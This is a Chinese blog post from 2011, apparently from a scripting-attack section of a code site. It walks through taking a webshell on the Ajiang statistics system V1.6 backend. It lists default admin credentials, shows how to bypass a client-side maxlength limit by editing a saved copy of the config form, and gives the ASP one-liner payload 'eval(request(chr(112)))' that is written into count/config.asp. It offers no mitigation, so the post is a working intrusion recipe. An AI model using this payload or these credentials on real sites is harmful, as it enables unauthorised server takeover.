当前位置: 代码网 > 服务器>网络安全>脚本攻防 > 阿江统计系统V1.6后台拿SHELL的方法

阿江统计系统V1.6后台拿SHELL的方法

2011年03月31日 脚本攻防 我要评论
阿江统计系统V1.6后台拿SHELL的方法因是大约一个月前在刀客的群里 看到刀客大牛用这个统计系统拿下了一个SHELL 那个时候我没怎么注意 因为平时碰到这样的站很少 也就没听大牛们的详细思路了!... 11-03-31

无奈到了自己这里今天下午又碰到个一样的站 纠结···

不多说了 首先感谢小帆同学 猪猪同学对程序代码的分析·(我自己硬是整了半个小时没整出来利用方法·)

此后台默认的账号密码是 admin admin ,  itlearner  itlearner

先进后台

来到修改配置界面 保存源文件到本地

本地打开源文件 找到原文章访问量 把maxlength="10 修改为 maxlength="100  下边是修改后的截图

然后在本地文件修改action地址 例如ie 中的提交地址是upload/2011/1/201101071923425208.jpg" width="581" onload="resizepic(this)" height="50" alt="" />

然后保存文件 用ie 打开 在网站访问量地址后写入  0:eval(request(chr(112)))

 

这个一句话的密码是p  点击修改 一句话就被插到了 count/config.asp 这个文件了 打开一句话客户端就可以连接了

只是个自己积累的小小的过程 对于网上关于阿江统计拿shell的方法我也测试了很多 但是没几个能成功的 所以专门写了这个文章出来 其实就是本地修改下字节 因为源程序中限制了写入的字节数 没有什么技术含量 不要骂我···

文章作者:冰鱼

(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com